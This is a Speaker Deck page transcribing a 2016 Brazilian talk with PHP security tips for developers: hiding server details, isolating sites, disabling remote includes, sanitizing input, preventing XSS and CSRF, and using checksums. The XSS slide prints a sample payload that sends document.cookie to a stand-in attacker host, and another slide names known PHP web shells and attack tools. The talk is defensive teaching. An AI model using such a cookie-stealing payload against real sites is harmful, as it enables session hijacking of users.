Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Dicas de segurança para o PHP e seus amigos
Search
Joubert RedRat
November 18, 2016
Technology
0
27
Dicas de segurança para o PHP e seus amigos
Joubert RedRat
November 18, 2016
Tweet
Share
More Decks by Joubert RedRat
See All by Joubert RedRat
Testes de integração com Testcontainers
joubertredrat
0
19
Retome o controle do seu analytics com Matomo
joubertredrat
0
27
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
31
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
31
O poder do Object Calisthenics no PHP
joubertredrat
0
120
Playing with Docker and Docker Compose
joubertredrat
0
130
Why migrate your application to microservices?
joubertredrat
0
23
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
26
Uso prático de fakes para mocks no Golang
joubertredrat
0
81
Other Decks in Technology
See All in Technology
面倒な作業はAIにおまかせ。Flutter開発をスマートに効率化
ruideengineer
0
260
Lazy application authentication with Tailscale
bluehatbrit
0
210
SmartNewsにおける 1000+ノード規模 K8s基盤 でのコスト最適化 – Spot・Gravitonの大規模導入への挑戦
vsanna2
0
140
20250705 Headlamp: 專注可擴展性的 Kubernetes 用戶界面
pichuang
0
270
Model Mondays S2E04: AI Developer Experiences
nitya
0
140
改めてAWS WAFを振り返る~業務で使うためのポイント~
masakiokuda
2
260
B2C&B2B&社内向けサービスを抱える開発組織におけるサービス価値を最大化するイニシアチブ管理
belongadmin
1
7.1k
Zero Data Loss Autonomous Recovery Service サービス概要
oracle4engineer
PRO
2
7.8k
いつの間にか入れ替わってる!?新しいAWS Security Hubとは?
cmusudakeisuke
0
130
LangSmith×Webhook連携で実現するプロンプトドリブンCI/CD
sergicalsix
1
240
さくらのIaaS基盤のモニタリングとOpenTelemetry/OSC Hokkaido 2025
fujiwara3
3
440
ビズリーチにおけるリアーキテクティング実践事例 / JJUG CCC 2025 Spring
visional_engineering_and_design
1
130
Featured
See All Featured
Building Applications with DynamoDB
mza
95
6.5k
Being A Developer After 40
akosma
90
590k
Java REST API Framework Comparison - PWX 2021
mraible
31
8.7k
VelocityConf: Rendering Performance Case Studies
addyosmani
332
24k
For a Future-Friendly Web
brad_frost
179
9.8k
The Art of Programming - Codeland 2020
erikaheidi
54
13k
Music & Morning Musume
bryan
46
6.6k
Build The Right Thing And Hit Your Dates
maggiecrowley
36
2.8k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
281
13k
Testing 201, or: Great Expectations
jmmastey
43
7.6k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
34
5.9k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
15
1.5k
Transcript
Dicas de segurança para o PHP e seus amigos BHACK
2016 – SEGURANÇA TI CONHECIMENTO
Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no
meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos
Dicas de segurança para o PHP e seus amigos INFORMAÇÃO
É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO
Dicas de segurança para o PHP e seus amigos 1ª
DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 3ª
DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include
Dicas de segurança para o PHP e seus amigos 4ª
DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 4ª
DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja
Dicas de segurança para o PHP e seus amigos 6ª
DICA EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 7ª
DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>
Dicas de segurança para o PHP e seus amigos 8ª
DICA CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 8ª
DICA - CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 9ª
DICA USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos 9ª
DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos ACABOU
AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM